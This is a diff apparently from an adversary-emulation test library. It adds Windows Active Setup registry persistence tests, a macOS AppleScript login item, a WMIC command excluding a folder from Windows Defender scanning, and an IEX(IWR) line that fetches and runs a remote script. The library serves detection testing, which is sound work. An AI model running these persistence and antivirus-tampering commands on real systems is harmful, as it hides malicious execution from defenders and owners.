Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number
|
||||
This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user,
|
||||
which will force the StubPath payload (if set) to execute.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -0,0 +1,67 @@
|
||||
attack_technique: T1547.014
|
||||
display_name: 'Active Setup'
|
||||
atomic_tests:
|
||||
- name: 'HKLM - Add atomic_test key to launch executable as part of user setup'
|
||||
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
|
||||
description: |
|
||||
This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and
|
||||
forcing to run active setup using the "runonce.exe /AlternateShellStartup" command.
|
||||
Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
|
||||
|
||||
Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in.
|
||||
The payload will only run once unless the cleanup command is run in between tests.
|
||||
|
||||
[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: 'HKLM - Add malicious StubPath value to existing Active Setup Entry'
|
||||
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
description: |
|
||||
This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number
|
||||
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
description: |
|
||||
This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user,
|
||||
which will force the StubPath payload (if set) to execute.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
@@ -10,6 +10,8 @@ Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/
|
||||
|
||||
- [Atomic Test #1 - Persistence by modifying Windows Terminal profile](#atomic-test-1---persistence-by-modifying-windows-terminal-profile)
|
||||
|
||||
- [Atomic Test #2 - Add macOS LoginItem using Applescript](#atomic-test-2---add-macos-loginitem-using-applescript)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -65,4 +67,47 @@ $(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalS
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Add macOS LoginItem using Applescript
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| scriptfile | path to Applescript source to add Safari LoginItem. | String | PathToAtomicsFolder/T1547.015/src/add_login_item.osa|
|
||||
| cleanup_script | path to Applescript source to delete Safari LoginItem. | String | PathToAtomicsFolder/T1547.015/src/remove_login_item.osa|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
osascript #{scriptfile}
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
osascript #{cleanup_script}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -39,4 +39,30 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
mv -Force #{settings_json_tmp} #{settings_json_def}
|
||||
taskkill /F /IM "#{calculator}" > $null
|
||||
name: powershell
|
||||
name: powershell
|
||||
- name: Add macOS LoginItem using Applescript
|
||||
auto_generated_guid: 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
description: |
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
scriptfile:
|
||||
description: path to Applescript source to add Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa
|
||||
cleanup_script:
|
||||
description: path to Applescript source to delete Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
|
||||
executor:
|
||||
command: |
|
||||
osascript #{scriptfile}
|
||||
cleanup_command: |
|
||||
osascript #{cleanup_script}
|
||||
name: bash
|
||||
@@ -0,0 +1,5 @@
|
||||
tell application "System Events"
|
||||
get full name of current user
|
||||
make new login item at end of login items with properties ¬
|
||||
{path:"/Applications/Safari.app", name:"Safari"}
|
||||
end tell
|
||||
@@ -0,0 +1,4 @@
|
||||
tell application "System Events"
|
||||
get full name of current user
|
||||
delete login item "Safari"
|
||||
end tell
|
||||
@@ -238,7 +238,7 @@ Upon execution administrative command prompt should open
|
||||
| executable_binary | Binary to execute with UAC Bypass | Path | C:\Windows\System32\cmd.exe|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
|
||||
@@ -102,7 +102,6 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Bypass UAC by Mocking Trusted Directories
|
||||
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
|
||||
description: |
|
||||
|
||||
@@ -180,6 +180,7 @@ cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
|
||||
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
|
||||
Write-Host Follow the installation prompts to continue
|
||||
cmd /c "$env:Temp\winzip.exe"
|
||||
|
||||
@@ -106,6 +106,7 @@ atomic_tests:
|
||||
prereq_command: |
|
||||
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
|
||||
get_prereq_command: |
|
||||
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
|
||||
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
|
||||
Write-Host Follow the installation prompts to continue
|
||||
cmd /c "$env:Temp\winzip.exe"
|
||||
|
||||
@@ -78,6 +78,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
|
||||
|
||||
- [Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36---disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
|
||||
|
||||
- [Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37---wmic-tamper-with-windows-defender-evade-scanning-folder)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -1517,4 +1519,37 @@ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Applicatio
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning Folder
|
||||
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
|
||||
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```cmd
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -745,4 +745,19 @@ atomic_tests:
|
||||
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
|
||||
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: WMIC Tamper with Windows Defender Evade Scanning Folder
|
||||
auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
description: |
|
||||
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
|
||||
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
|
||||
cleanup_command: |
|
||||
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
@@ -1168,3 +1168,17 @@ ffcbfaab-c9ff-470b-928c-f086b326089b
|
||||
f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
|
||||
9c10d16b-20b1-403a-8e67-50ef7117ed4e
|
||||
aca9ae16-7425-4b6d-8c30-cad306fdbd5b
|
||||
30cbeda4-08d9-42f1-8685-197fad677734
|
||||
59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
a574dafe-a903-4cce-9701-14040f4f3532
|
||||
36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
deff4586-0517-49c2-981d-bbea24d48d71
|
||||
39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
716e756a-607b-41f3-8204-b214baf37c1d
|
||||
6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
|
||||
Reference in New Issue
Block a user